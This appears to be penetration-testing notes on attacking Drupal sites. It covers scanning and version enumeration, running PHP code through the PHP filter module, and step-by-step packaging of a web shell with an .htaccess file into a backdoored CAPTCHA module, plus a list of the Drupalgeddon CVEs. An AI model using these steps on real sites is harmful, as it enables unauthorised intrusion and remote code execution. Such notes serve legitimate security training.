Drupal

Open-source Content Management System (CMS)

Drupal is written in PHP and supports using MySQL or PostgreSQL for the backend. Additionally, SQLite can be used if there's no DBMS installed.

Tools

Tool	Details
droopescan	A plugin-based scanner that aids security researchers in identifying issues with several CMS. droopescan scan drupal --url <URL>

Default Users

Role	Description
Administrator	This user has complete control over the Drupal website.
Authenticated User	These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
Anonymous	All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Manual Enumeration

Version

Source code	Meta tag of name generator: <meta name="Generator" content="Drupal 8 (https://www.drupal.org)" />
CHANGELOG.txt	In the Drupal root directory
README.txt	In the Drupal root directory
nodes	/node/<NODE_ID>

Attacks

Built-in

Before version 8

In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." In modules menu, we could tick the check box next to the module and scroll down to Save configuration. Next, we could go to Content --> Add content and create a Basic page. We can now create a page with a malicious PHP snippet. We also want to make sure to set Text format drop-down to PHP code. After clicking save, we will be redirected to the new page, ex. http://<DOMAIN>/node/<ID>.

From version 8

From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves. We'd start by downloading the most recent version of the module from the Drupal website (link). Once downloaded go to Administration > Reports > Available updates (Location may differ based on the Drupal version and may be under the Extend menu). From here, click on Browse, select the file from the directory we downloaded it to, and then click Install. Once the module is installed, we can click on Content and create a new basic page, similar to how we did in the Drupal 7.

Backdoor Module

Drupal allows users with appropriate permissions to upload a new module. A backdoored module can be created by adding a shell to an existing module. Modules can be found on the drupal.org website.

• Let's pick a module such as CAPTCHA. Scroll down and copy the link for the tar.gz archive. Download the archive and extract its contents.

• Create a PHP web shell.

• Next, we need to create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.

  <IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteBase /
  </IfModule>

  The configuration above will apply rules for the / folder when we request a file in /modules.

• Copy both of these files to the captcha folder and create an archive.

  mv shell.php .htaccess captcha
  tar cvf captcha.tar.gz captcha/

• With administrative access, click on Manage and then Extend on the sidebar. Next, click on the + Install new module button, and we will be taken to the install page, such as http://<DOMAIN>/admin/modules/install. Browse to the backdoored Captcha archive and click Install.

• Once the installation succeeds, browse to /modules/captcha/shell.php to execute commands.

CVE

CVE-2014-3704	Drupalgeddon Affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.
CVE-2018-7600	Drupalgeddon2 Affects versions of Drupal prior to 7.58 and 8.5.1. Is a remote code execution vulnerability. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.
CVE-2018-7602	Drupalgeddon3 Affects multiple versions of Drupal 7.x and 8.x. Is a remote code execution vulnerability. This flaw exploits improper validation in the Form API.